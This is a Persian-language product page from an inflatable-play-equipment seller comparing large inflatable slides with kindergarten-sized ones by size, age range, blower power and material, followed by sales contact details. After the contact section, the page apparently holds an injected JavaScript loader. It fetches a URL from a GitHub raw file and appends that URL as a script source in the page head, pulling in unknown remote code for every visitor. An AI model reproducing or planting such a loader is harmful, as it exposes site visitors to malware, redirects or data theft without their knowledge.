تفاوت سرسره های بادی بزرگ و مهد کودکی
تفاوت سرسره های بادی بزرگ و مهد کودکی

تفاوت سرسره های بادی بزرگ و مهد کودکی

  • تفاوت سرسره های بادی این محصولات تفاوت های زیادی دارن از جمله ابعاد اندازه و استاندار های این دستگاه

    ابعاد و اندازه

    سرسره بادی های بزرگ در شهر بازی ها و پار های آبی و پارک های که فضای مناسبی داشته باشند استفاده می شود در مقابل سرسره بادی های کهد کودکی در مهد کودک ها و پارک ها و شهر بازی ها استفاده می شود. البته ابعاد اندازه هر دو متغیر هستند ولی تا چقدر؟ تا محدود استادارد هر دستگاه.

    تفاوت سرسره های بادی

    تفاوت سرسره بادی مهد کودکی کوچیک و راحتر میشه حمل کرد در مقابل سرسره بادی بزرگ در هرجای نمیشه استفاده کرد. سرسره مهد کودک ها رو فقط کودکان از 2 تا 6 سال می توان استفاده کنند در مقابل سرسره های بزرگ نسبت به ابعاد اندازه رده سنی دارد. سرسره مهد کودکی نسبت سرسره بزرگ توع کمتری دارند در مقابل سرسره های بزرگ تنوع زیادی دارند. دمندن ( پمپ باد ) های مهدکودکی نیم اسب استفاده میشه در مقابل سرسره های بزرگ از دمند های یک و یک نیم اسب استفاده می گردد. سرسره های مهد کودکی در خانه هم می توانید استفاده کننید. زمان تحویل سرسره مهد کودک زود تر می باشد. جنس هر دو یکی می باشد و از با کیفیت ترین پارچه کره ای است که به صورت یک لایه ضخیم ساخته شده تا در برابر فشار بالای هوا مقاوم باشد. همچنین کیفیت این پارچه به دور از پوسدگی زودرس است.

    نحوه خرید قصر بادی ها

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره بادی ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید